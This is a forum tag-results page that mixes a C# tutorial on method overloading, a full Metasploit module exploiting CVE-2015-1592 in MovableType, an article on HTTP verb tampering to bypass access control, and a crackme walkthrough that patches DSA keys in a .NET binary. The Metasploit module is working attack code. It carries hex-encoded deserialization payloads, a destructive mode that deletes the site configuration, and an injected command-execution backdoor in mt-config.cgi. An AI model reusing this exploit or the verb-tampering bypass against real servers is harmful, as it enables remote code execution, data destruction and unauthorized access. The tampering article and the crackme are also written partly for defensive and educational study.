Search the Community
Showing results for tags 'method'.
-
This article will cover almost every OOP concept that a novice/beginner developer hunt for, and not only beginners, the article’s purpose is to be helpful to experience professionals also who need to sometimes brush-up their concepts or who prepare for interviews. Pre-requisites Since this is the first part of the series, my readers should have basic knowledge of C# and should be aware of OOP concepts and terminology. OOP 1. What is OOP and what is advantage of OOP? OOP stands for "Object-Oriented Programming." Remember, it's OOP not OOPS,’S’ may stand for system, synopsis, structure etc. It is a programming approach entirely based on objects, instead of just functions and procedures like in procedural languages. It is like a programming language model organized around objects rather than "actions" and data rather than logic. An "object" in an OOP language refers to a specific type, or "instance," of a class. Each object has a structure exactly similar to other objects in a class, but can have individual properties/values. An object can also invoke methods, specific to that object OOP makes it easier for developers to structure and organize software programs. Individual objects can be modified without affecting other aspects of the program therefore it is also easier to update and change programs written in object-oriented languages. Since the nature of software programs have grown larger over the years, OOP has made developing these large programs more manageable and readable. 2. What are OOP Concepts? Following are OOP concepts explained in brief, we’ll take the topics in detail. Data Abstraction: Data Abstraction is a concept in which the internal and superfluous details of the implementation of a logic is hidden from an end user(who is using the program) .A user can use any of the data and method from the class without knowing about how this is created or what is the complexity behind it. In terms of a real world example, when we drive a bike and change the gears we don’t have to care about how internally its working, like how lever is pulled or how chain is set. Inheritance: Inheritance is most popular Concept in OOP’s .This provides a developer an advantage called reusability of code. Suppose a class is written having functions with specific logic, then we can derive that class into our newly created class and we don’t have to write the logic again for derived class functions, we can use them as it is. Data Encapsulation: Wrapping up of member data and member functions of a class in a single unit is called encapsulation. The visibility of the member functions,data members is set via access modifiers used in class. Polymorphism: Poly means many and morphism means changing or alterable. The Concepts Introduces in the form of Many behaviours of an object. Message Communication: Message Communication means when an object passes the call to method of class for execution. OK, we covered lots of theory, now it’s time for action. I hope that will be interesting. We’ll cover the topics in a series as follows: 3. Polymorphism: In this article we will cover almost all the scenarios of compile type polymorphism, the use of params keyword in detail, and case study or hands on to different possible combinations of the thoughts coming to our mind while coding. Method Overloading or Early Binding or Compile Time Polymorphism Note: Each and every code snippet written in this article is tried and tested. 1. Let's create a simple console application named InheritanceAndPolymorphism, and add a class named Overload.cs and add three methods named DisplayOverload having varied parameters as follows: Overload.cs public class Overload { public void DisplayOverload(int a){ System.Console.WriteLine("DisplayOverload " + a); } public void DisplayOverload(string a){ System.Console.WriteLine("DisplayOverload " + a); } public void DisplayOverload(string a, int { System.Console.WriteLine("DisplayOverload " + a + ; } } In the main method in Program.cs file, add the following code: Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.DisplayOverload(100); overload.DisplayOverload("method overloading"); overload.DisplayOverload("method overloading", 100); Console.ReadKey(); } } Now when you run the application, the output is: The class Overload contains three methods named DisplayOverload, they only differ in the datatype of the parameters they consist of. In C# we can have methods with the same name, but the datatypes of their parameters should differ. This feature of C# is called method overloading. Therefore, we need not to remember lots of method names if a method differs in behavior, only providing different parameters to the methods can call a method individually. Point to remember: C# recognizes the method by its parameters and not only by its name. A signature signifies the full name of the method. So the name of a method or its signature is the original method name + the number and data types of its individual parameters. If we run project using following code: public void DisplayOverload() { } public int DisplayOverload(){ } We certainly get a compile time error as: Here we had two functions who differ only in the data type of the value that they return, but we got a compile time error, therefore, another point to remember comes, Point to remember: The return value/parameter type of a method is never the part of method signature if the names of the methods are same. So this is not polymorphism. If we run the project using following code: static void DisplayOverload(int a) { } public void DisplayOverload(int a) { } public void DisplayOverload(string a){ } We again get a compile time error: Can you differentiate with the modification done in the above code, we now have two DisplayOverload methods, that accept an int (integer). The only difference is that one method is marked static. Here the signature of the methods will be considered same as modifiers such as static are also not considered to be a part of method signature. Point to remember: Modifiers such as static are not considered as part of method signature. If we run the program as per following code, considering the method signature is different now: private void DisplayOverload(int a) { } private void DisplayOverload(out int a) { a = 100; } private void DisplayOverload(ref int a) { } We again get a compile time error: The signature of a method not only consists of the data type of the parameter but also the type/kind of parameter such as ref or out etc. Method DisplayOverload takes an int with different access modifiers i.e. out/ref etc, the signature on each is different. Point to remember: The signature of a method consists of its name, number and types of its formal parameters. The return type of a function is not part of the signature. Two methods can not have the same signature and also non-members cannot have the same name as members. 4. Role of Params Parameter in Polymorphism A method can be called by four different types of parameters: Pass by value, Pass by reference, As an output parameter, Using parameter arrays. As explained earlier the parameter modifier is never the part of method signature. Now let’s focus on Parameter Arrays. A method declaration means creating a separate declaration space in memory. So anything created will be lost at the end of the method. Running following code: public void DisplayOverload(int a, string a) { } public void Display(int a) { string a; } Results in compile time error: Point to remember: Parameter names should be unique. And also we can not have a parameter name and a declared variable name in the same function as same. In the case of pass by value, the value of the variable is passed and in the case of ref and out, the address of the reference is passed. When we run the following code: Overload.cs public class Overload { private string name = "Akhil"; public void Display() { Display2(ref name, ref name); System.Console.WriteLine(name); } private void Display2(ref string x, ref string y) { System.Console.WriteLine(name); x = "Akhil 1"; System.Console.WriteLine(name); y = "Akhil 2"; System.Console.WriteLine(name); name = "Akhil 3"; } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } We get out put as: We are allowed to pass the same ref parameter as many times as we want. In the method Display the string name has a value of Akhil. Then by changing the string x to Akhil1, we are actually changing the string name to Akhil1 as name is passed by reference. Variables x and name refer to the same string in memory. Changing one changes the other. Again changing y also changes name variable as they refer to the same string anyways. Thus variables x, y and name refer to the same string in memory. When we run the following code: Overload.cs public class Overload { public void Display() { DisplayOverload(100, "Akhil", "Mittal", "OOP"); DisplayOverload(200, "Akhil"); DisplayOverload(300); } private void DisplayOverload(int a, params string[] parameterArray) { foreach (string str in parameterArray) Console.WriteLine(str + " " + a); } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } We get output: We will often get into a scenario where we would like to pass n number of parameters to a method. Since C# is very particular in parameter passing to methods, if we pass an int where a string is expected, it immediately breaks down. But C# provides a mechanism for passing n number of arguments to a method, we can achieve it with the help of params keyword. Point to remember: This params keyword can only be applied to the last argument of the method. So the n number of parameters can only be at the end. In the case of method DisplayOverload, the first argument has to be an integer, the rest can be from zero to an infinite number of strings. If we add a method like: private void DisplayOverload(int a, params string[] parameterArray, int { } We get a compile time error as: Thus is is proved that params keyword will be the last parameter in a method, this is already stated in the latest point to remember. Overload.cs public class Overload { public void Display() { DisplayOverload(100, 200, 300); DisplayOverload(200, 100); DisplayOverload(200); } private void DisplayOverload(int a, params int[] parameterArray) { foreach (var i in parameterArray) Console.WriteLine(i + " " + a); } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } When we run the code we get: Therefore: Point to Remember: C# is very smart to recognize if the penultimate argument and the params have the same data type. The first integer is stored in the variable a, the rest are made part of the array parameterArray. private void DisplayOverload(int a, params string[][] parameterArray) { } private void DisplayOverload(int a, params string[,] parameterArray) { } For the above written code, we again get a compile time error and a new point to remember as well: Point to remember: same as error above. The data type of the params argument must be a single dimensional array. Therefore [ ][ ] is allowed but not [,]. We also not allowed to combine the params keyword with ref or out. Overload.cs public class Overload { public void Display() { string[] names = {"Akhil", "Ekta", "Arsh"}; DisplayOverload(3, names); } private void DisplayOverload(int a, params string[] parameterArray) { foreach (var s in parameterArray) Console.WriteLine(s + " " + a); } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } Output We are, therefore, allowed to pass a string array instead of individual strings as arguments. Here, names is a string array which has been initialized using the short form. Internally when we call the function DisplayOverload, C# converts the string array into individual strings. Overload.cs public class Overload { public void Display() { string [] names = {"Akhil","Arsh"}; DisplayOverload(2, names, "Ekta"); } private void DisplayOverload(int a, params string[] parameterArray) { foreach (var str in parameterArray) Console.WriteLine(str + " " + a); } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } Output So, we got two errors. For the above mentioned code, C# does not permit mix and match. We assumed that the last string “Ekta” would be added to the array of strings names or convert names to individual strings and then add the string “Ekta” to it. Quite logical. Internally before calling the function DisplayOverload, C# accumulates all the individual parameters and converts them into one big array for the params statement. Overload.cs public class Overload { public void Display() { int[] numbers = {10, 20, 30}; DisplayOverload(40, numbers); Console.WriteLine(numbers[1]); } private void DisplayOverload(int a, params int[] parameterArray) { parameterArray[1] = 1000; } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } Output We see that the output produced is the proof of concept. The member parameterArray[1] of array has an initial value of 20 and in the method DisplayOverload, we changed it to 1000. So the original value changes, this shows that the array is given to the method DisplayOverload, Hence proved. Overload.cs public class Overload { public void Display() { int number = 102; DisplayOverload(200, 1000, number, 200); Console.WriteLine(number); } private void DisplayOverload(int a, params int[] parameterArray) { parameterArray[1] = 3000; } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } Output In the above mentioned scenario C# creates an array containing 1000 102 and 200. We now change the second member of array to 3000 which has nothing to do with the variable number. As DisplayOverload has no knowledge of number, so how can DisplayOverload change the value of the int number? Therefore it remains the same. Overload.cs public class Overload { public void Display() { DisplayOverload(200); DisplayOverload(200, 300); DisplayOverload(200, 300, 500, 600); } private void DisplayOverload(int x, int y) { Console.WriteLine("The two integers " + x + " " + y); } private void DisplayOverload(params int[] parameterArray) { Console.WriteLine("parameterArray"); } } Program.cs class Program { static void Main(string[] args) { Overload overload = new Overload(); overload.Display(); Console.ReadKey(); } } Output Now we'll talk about method overloading. C# is extremely talented though partial. It does not appreciate the params statement and treats it as a stepchild. When we invoke DisplayOverload only with one integer, C# can only call the DisplayOverload that takes a params as a parameter as it matches only one int. An array can contain one member too. The fun is with the DisplayOverload that is called with two ints now. So here we have a dilemma. C# can call the params DisplayOverload or DisplayOverload with the two ints. As discussed earlier, C# treats the params as a second class member and therefore chooses the DisplayOverload with two ints. When there are more than two ints like in the third method call, C# is void of choice but to grudgingly choose the DisplayOverload with the params. C# opts for the params as a last resort before flagging an error. Now a bit tricky example, yet important: Overload.cs public class Overload { public static void Display(params object[] objectParamArray) { foreach (object obj in objectParamArray) { Console.Write(obj.GetType().FullName + " "); } Console.WriteLine(); } } Program.cs class Program { static void Main(string[] args) { object[] objArray = { 100, "Akhil", 200.300 }; object obj = objArray; Overload.Display(objArray); Overload.Display((object)objArray); Overload.Display(obj); Overload.Display((object[])obj); Console.ReadKey(); } } Output In the first instance we are passing the method Display an array of object that looks like object. Since all the classes are derived from a common base class object, we can do that. The method Display gets an array of objects objectParamArray. In the foreach object class has a method named GetType that returns an object that looks like Type, which too has a method named FullName that returns the name of the type. Since three different types displayed. In the second method call of Display we are casting objArray to an object. Since there is no conversion available from converting an object to an object array i.e. object [ ], so only a one element object [ ] is created. It's the same case in the third invocation and the last explicitly casts to an object array. For proof of concept: Overload.cs public class Overload { public static void Display(params object[] objectParamArray) { Console.WriteLine(objectParamArray.GetType().FullName); Console.WriteLine(objectParamArray.Length); Console.WriteLine(objectParamArray[0]); } } Program.cs class Program { static void Main(string[] args) { object[] objArray = { 100, "Akhil", 200.300 }; Overload.Display((object)objArray); Console.ReadKey(); } } Output 5. Conclusion In this article of our Diving in OOP series we learnt about compile time polymorphism, it is also called early binding or method overloading. We catered most of the scenarios specific to polymorphism.We also learned about the use of powerful params keyword and its use in polymorphism. To sum up lets list down all the point to remembers once more: C# recognizes the method by its parameters and not only by its name. The return value/parameter type of a method is never the part of method signature if the names of the methods are same. So this is not polymorphism. Modifiers such as static are not considered as part of method signature. The signature of a method consists of its name, number and types of its formal parameters. The return type of a function is not part of the signature. Two methods can not have the same signature and also non-members cannot have the same name as members. Parameter names should be unique. And also we can not have a parameter name and a declared variable name in the same function as same. In case of pass by value, the value of the variable is passed and in the case of ref and out, the address of the reference is passed. This params keyword can only be applied to the last argument of the method.So the n number of parameters can only be at the end. C# is very smart to recognize if the penultimate argument and the params have the same data type. Parameter array must be a single dimensional array. Sursa
- 1 reply
-
- c# tutorial
- diving in oop
-
(and 3 more)
Tagged with:
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'SixApart MovableType Storable Perl Code Execution', 'Description' => %q{ This module exploits a serialization flaw in MovableType before 5.2.12 to execute arbitrary code. The default nondestructive mode depends on the target server having the Object::MultiType and DateTime Perl modules installed in Perl's @InC paths. The destructive mode of operation uses only required MovableType dependencies, but it will noticeably corrupt the MovableType installation. }, 'Author' => [ 'John Lightsey', ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-1592' ], [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ], ], 'Privileged' => false, # web server context 'Payload' => { 'DisableNops' => true, 'BadChars' => ' ', 'Space' => 1024, }, 'Compat' => { 'PayloadType' => 'cmd' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Feb 11 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']), OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false]) ], self.class ) end =begin #!/usr/bin/perl # generate config parameters for injection checks use Storable; { package XXXCHECKXXX; sub STORABLE_thaw { return 1; } sub STORABLE_freeze { return 1; } } my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj}); $frozen = unpack 'H*', $frozen; print "LFI test for storable flaw is: $frozen\n"; { package DateTime; use overload '+' => sub { 'ignored' }; } =end def check vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078' } }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def exploit if datastore['DESTRUCTIVE'] == true exploit_destructive else exploit_nondestructive end end =begin #!/usr/bin/perl # Generate nondestructive config parameter for RCE via Object::MultiType # and Try::Tiny. The generated value requires minor modification to insert # the payload inside the system() call and resize the padding. use Storable; { package Object::MultiType; use overload '+' => sub { 'ingored' }; } { package Object::MultiType::Saver; } { package DateTime; use overload '+' => sub { 'ingored' }; } { package Try::Tiny::ScopeGuard; } my $try_tiny_loader = bless {}, 'DateTime'; my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver'; my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType'; my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard'; my $data = [$try_tiny_loader, $try_tiny_executor]; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); $frozen = unpack 'H*', $frozen; print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive print_status("#{peer} - Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => config_payload } }, 5) end =begin #!/usr/bin/perl # Generate destructive config parameter to unlink mt-config.cgi use Storable; { package CGITempFile; } my $unlink_target = "mt-config.cgi"; my $cgitempfile = bless \$unlink_target, "CGITempFile"; my $data = [$cgitempfile]; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); $frozen = unpack 'H*', $frozen; print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive print_status("#{peer} - Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769' } }) if res && res.code == 200 print_status("Successfully sent unlink request") else fail_with(Failure::Unknown, "Error sending unlink request") end # Now we rewrite mt-config.cgi to accept a payload print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'next_step', 'step' => 'optional', 'default_language' => 'en_us', 'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1", 'set_static_uri_to' => '/', 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/', } }) if res && res.code == 200 print_status("Successfully sent mt-config rewrite request") else fail_with(Failure::Unknown, "Error sending mt-config rewrite request") end # Finally send the payload print_status("#{peer} - Sending payload request") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt.cgi'), 'vars_get' => { 'xyzzy' => payload.encoded, } }, 5) end end Surs?: http://dl.packetstormsecurity.net/1505-exploits/sixapart_movabletype_storable_exec.rb.txt
-
What is an HTTP VERB? Hypertext transfer protocol (HTTP) gives you list of methods that can be used to perform actions on the web server. Many of these methods are designed to help developers in deploying and testing HTTP applications in development or debugging phase. These HTTP methods can be used for nefarious purposes if the web server is misconfigured. Also, some high vulnerability like Cross Site Tracing (XST), a form of cross site scripting using the server’s HTTP TRACE method, is examined. In HTTP methods, GET and POST are most commonly used by developers to access information provided by a web server. HTTP allows several other method as well, which are less known methods. Following are some of the methods: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT Many of these methods can potentially pose a critical security risk for a web application, as they allow an attacker to modify the files stored on the web server, delete the web page on the server, and upload a web shell to the server which leads to stealing the credentials of legitimate users. Moreover, when rooting the server, the methods that must be disabled are the following: PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an ASP or PHP file that executes commands by invoking cmd.exe), or by simply using the victim’s server as a file repository. DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a Denial of Service (DOS) attack. CONNECT: This method could allow a client to use the web server as a proxy TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes of developers. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which has been discovered by Jeremiah Grossman. If an application requires any one of the above mentioned, such as in most cases REST Web Services may require the PUT or DELETE method, it is really important to check that their configuration/usage is properly limited to trusted users and safe environment. Many web environments allow verb based authentication and access control (VBAAC). This is basically nothing but a security control using HTTP methods such as GET and POST (usually used). Let’s take an example to make you understand better. JAVA EE web XML file <security-constraint> <web-resource-<a href="http://resources.infosecinstitute.com/collection/">collection</a>> <url-pattern>/auth/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <role-name>root</role-name> </auth-constraint> </security-constraint> In the above example, the rule is limited to the /auth directory to root role only. However, this limitation can be bypasses using HTTP verb tempering even after limited/restricted access to the mentioned role. As we can see, the above mentioned configuration has only restricted the same using GET and POST methods only. We can easily bypass this with the use of the HEAD method; you can also try any other HTTP methods as well such as PUT, TRACK, TRACE, DELETE, etc. Also, you can try to bypass the same by sending arbitrary strings such as ASDF as an HTTP verb (method). Following are some conditions where bypassing is possible: It has GET functionality that is not idempotent or execute an arbitrary HTTP Method It uses a security control that lists HTTP verbs The security control fails to block HTTP methods that are not listedThese are the most common scenarios where you can bypass the same. It also depend upon rule misconfiguration. How we can bypass VBAAC with HTTP methods Using HEAD method As mentioned above, the HEAD Method is used to fetch a result similar to GET but with no response body. Imagine a URL in your application that is protected by security constraints that restrict access to the /Auth directory with GET and POST only. http://httpsecure.org/auth/root.jsp?cmd=adduser If you try to force browse to the URL in a browser, a security constraint will check the rule to see whether the requested resource and requestor are authorized or not. The first rule will check the HTTP method as it came from the browser, so it should be a GET or POST method that’s stopped by the security constraint. If you use a browser proxy such as BurpSuite to intercept the request and craft it by changing GET to HEAD method, since HEAD method is not listed in the security constraint the request willnot be blocked. So the adduser function will be successfully invoked and you will get the empty response back in the browser due to HEAD functionality. Using Arbitrary HTTP Verbs Most of the platforms allow the use of arbitrary HTTP verbs such as PHP, JAVA EE. These methods execute similar to a GET request, which enables you to bypass the same. Most importantly, using the arbitrary methods response will not be stripped as it is for the HEAD method. You can see the internal pages easily. With the using arbitrary method, instead of the HEAD method page source code can be viewed. Some Vendors Allow HEAD Verbs Many server vendors allow HEAD verbs by default, such as: APACHE 2.2.8 JBOSS 4.2.2 WEBSPERE 6.1 TOMCAT 6.0 IIS 6.0 WEBLOGIC 8.2 Allowing the HEAD method is not a vulnerability at all, as it is a requirement in the RFC. Let’s have a look at some of the most popular outdated application security mechanisms to see if we can use them to bypass VBAAC.Following are the servers which may get affected by VERB tampering techniques. JAVA EE Allow HTTP Verbs in Policy -YES Bypassing Possible – YES HEAD can be in policy – YES .htaccess Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES ASP.NET Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES Java EE Containers Let’s consider the following security constraint policy: <security-constraint> <display-name>Example Security Constraint Policy</display-name> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name> <!-- Define the context-relative URL(s) to be protected --> <url-pattern>/auth/security/*</url-pattern> <!-- If you list http methods, only those methods are protected --> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> In the above mentioned code, listed methods are protected, so this rule will only trigger if a request for anything in the /auth/security directory uses a verb in the <http-method> list. The best way to implement this policy would be to block any method that is not listed, butthat is not the way these mechanisms currently behave, and you can see that the HEAD verb is not in this list. So, forwarding the HTTP HEAD request will bypass this policy entirely, and after that, the application server will pass the request to the GET handler. The right approach to secure a JAVA EE is to remove all the <http-method> elements from this policy, which simply applies this rule to all the HTTP methods, but if you still want to restrict access to specific method, then you need to setup two policies as mentioned below. <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> </web-resource-collection> ... </security-constraint> So, the first policy denies a GET request to access and second policy denies all. ASP.NET Authorization Let’s have a look at the ASP.NET authorization security mechanism configuration, which is vulnerable to bypass with VBAAC. <authorization> <allow verbs="POST" users="joe"/> <allow verbs="GET" users="*"/> <deny verbs="POST" users="*"/> </authorization> In the above mentioned rule, the user JOE can only submit a POST request. In this example, this cannot be bypassed, the reason being GET methods are allowed to everyone. So, there are no securities to bypass using the HEAD method. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="POST,GET" users="*" /> </authorization> This one is vulnerable to bypass using HEAD method. This is possible because .Net implicitly inserts an “allow all” rule in to each authorization. After listing their role entitlements appropriately, append a “deny all” rule. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="*" users="*" /> </authorization> This will ensure that the only requests that pass the authorization check are those that have a specific HTTP verb that is in the authorization rule. Some Points to remember 1) Always enable deny all option 2) Configure your web and application server to disallow HEAD requests entirely Thanks for reading References https://www.owasp.org/index.php/Test_HTTP_Methods_%28OTG-CONFIG-006%29 http://www.aspectsecurity.com/research-presentations/bypassing-vbaac-with-http-verb- tampering Source
-
1. Introduction In this third part of the series, we will see something similar to the second article but a little bit more advanced. This article will cover the Digital Signature Algorithm (DSA) and Digital Signature Standard (DSS). 2. Tools Needed The target file (CryptoChallenge3.exe) DSAK: My own DSA/DSS Keygenerator (requires dotNetFx4) PEiD .NET Reflector Reflexil 3. What is DSA/DSS? Digital Signature Algorithm (DSA) is a public-key signature scheme developed by the U.S. National Security Agency (NSA). It was proposed by the U.S. National Institute of Standards and Technology (NIST) back in 1991 and has become a U.S. Federal Information Processing Standard (FIPS 186) called the Digital Signature Standard (DSS). It is considered to be the first digital signature scheme recognized by any government. DSA is a variant of the ElGamal Signature Scheme. A. Parameters P = A prime number in range 512 to 1024 bits which must be a multiple of 64 Q = A 160 bit prime factor of P-1 G = H^((P-1)/Q) mod P. H is any number < P-1 such that H^((P-1)/Q) mod P > 1 X = A random number < Q Y = G^X mod P Public keys are: (Q, P, G and Y). Private key is X (To find X one must solve the DLP Problem). B. Signing To sign a message (M) follow these steps: Generate a random number K where (K < Q) Compute: R = (G^K mod P) mod Q Compute: S = (K^-1*(SHA(M) + X*R)) mod Q The pair C(R,S) is the signature of M. C. Verifying Given the signature C(R,S) one would verify it as follows: Compute: W = S^-1 mod Q Compute: U1 = (SHA(M) * W) mod Q Compute: U2 = (R*W) mod Q Compute: V = ((G^U1 * Y^U2) mod P) mod Q Confirm that V == R D. Example Using the tool that I’ve recently made, “DSAKEYGENERATOR“, we’ll be able to see the previous steps in action. The tool is user friendly and gives full control, meaning you can either generate keys and test them and/or input your own keys and work on them. Prime P bits size from 512 to 1024. Generate new keys. To test the keys. Calculate Y in case you’ve already had the keys from somewhere else. Generate new G and X keys, Y will also be calculated automatically. Clicking “TEST” will cause a new window to show up: A checkbox that generates a random K every one second (checked by default and must be unchecked when trying to sign). Button to sign a message. Button to verify a message. 4. Target analyses Here we have the challenge as you see in the picture below: We load up the challenge in PEiD: That’s something new, we have a non-packed/protected .NET application, not like the previous two challenges which were made in MASM, but that’s not a problem. Since it’s a .NET application, we cannot use OllyDbg, instead we’ll use .NET Reflector. So load up the assembly in Reflector and keep expanding until you reach Form1: There are a lot of methods as you might see, but what interests us more is the method btn_check_Click since it’s related to the only button in this challenge. Click that method and you shall see: The code is easy to understand, we have the typed name put in a variable ‘text’ and the typed serial in ‘input’ name length must be between 3 and 15. Serial length must be between 0x4f (79d) and 0×51 (81d). After that a method called isHex(string x) does some checking, let’s find out what’s inside: This method uses Regex’s isMatch method to see if the typed serial matches the Regex string “^[0-9A-Fa-f]{40}[-][0-9A-Fa-f]{40}?$”. Let me explain each Regex symbol: ^: Start of string. [0-9A-Fa-f]: One from 0 to 9, A to F or a to f. {40}: Exactly 40 characters. [-]: one hyphen. ?: Once or none. $: End of string So the serial must contain 40 hexadecimal characters, a hyphen ‘-’ and another 40 hexadecimal characters. If name and serial are okay, the serial will be split into two parts, the first part before the hyphen and the second part after the hyphen, and put in a string array called strArray. After that, a method is called to check whether the serial is right or wrong; this method has three string parameters verify(string name, string rx, string sx) and returns a bool. Let’s get inside that method: If we compare the variables (integer8, exp, integer10 and integer11) with the verifying steps of DSA we’ll know that: modulus = order Q n = prime P integer3 = generator G integer4 = public key Y integer6 = rx = R = strArray[0] which is the first part of the serial integer8 = sx = S = strArray[1] which is the second part of the serial integer8 = W exp = u1 integer10 = u2 integer11 = v Now we have everything we need, the only problem is that it will take so much time to solve DLP since P, G and Y are 512 bits size. So what we are going to do is to change the challenge’s keys with new ones that we will have their private key X, meaning we are going to patch the target. And that’s the job of Reflexil. First open DSAKeygenerator and generate some 512 bit keys. Leave it open. Assuming you have already downloaded Reflexil. Extract the rar file and you’ll find a dll inside a folder, it’s called “Reflexil.Reflector.AIO.dll”. Move it to somewhere else where it won’t be deleted (C for example). Now go back to Reflector and do as shown in the pictures below: Choose the dll file and close. Now go back to menu Tools and click Reflexil. Right Click on Offset 0 and click Edit. Change the operand at offset 0 with the generated Q in DSAKeygenerator. The same to offset 13 with P, offset 26 with G and offset 39 with Y. I’ve got the following keys generated in DSAKeygenerator: Q = EEFBBFE158DBB7C602BE9540B89FF681EED0310D P = 86CC13E777A3ED808B3B17B3AC6C78D5ABA5F15746B1A68C72B6F530A6B723390B486228E0F715DBB593206801DF48E3E56DF57336E2BD6219EE8DEFD001F6E7 G = 1E342C53DBE73C97FF8D8022B8EB18329181B821B10A5DBFC2688DDCC9DB5DF84079DA58E81FEEA43AAD38A8C1D3901E25859C7AB63AFEE1145EFD02DCC9B1AA X = AF12001D2043D47E8E1B661958177B6068C8FAA2 Y = 2C166A5F90BD4B40D159CD48CC4391A8322BF3839DB58DA6EB0EEDF9D322AC3446EBAB0362F6BFB7127320C6CCED2CF77C915A1B56E5CE57A1758B53DAFA9C45 The result in Reflexil must look like: Now on the assembly browser, right click on the main assembly (1) and do as follows: Now that we have the challenge patched with the new keys, we must generate the signature (R,S) using DSAKeygenerator (Hope you didn’t close it! If so just fill each key with the one on top without clicking the ‘generate keys’ button) and click TEST as shown below: I’ve changed M to “Jamal Chahir” and unchecked the “RAND” checkbox so that I can get a fixed R and S. Now all we’ve got to do is fill in the name and serial 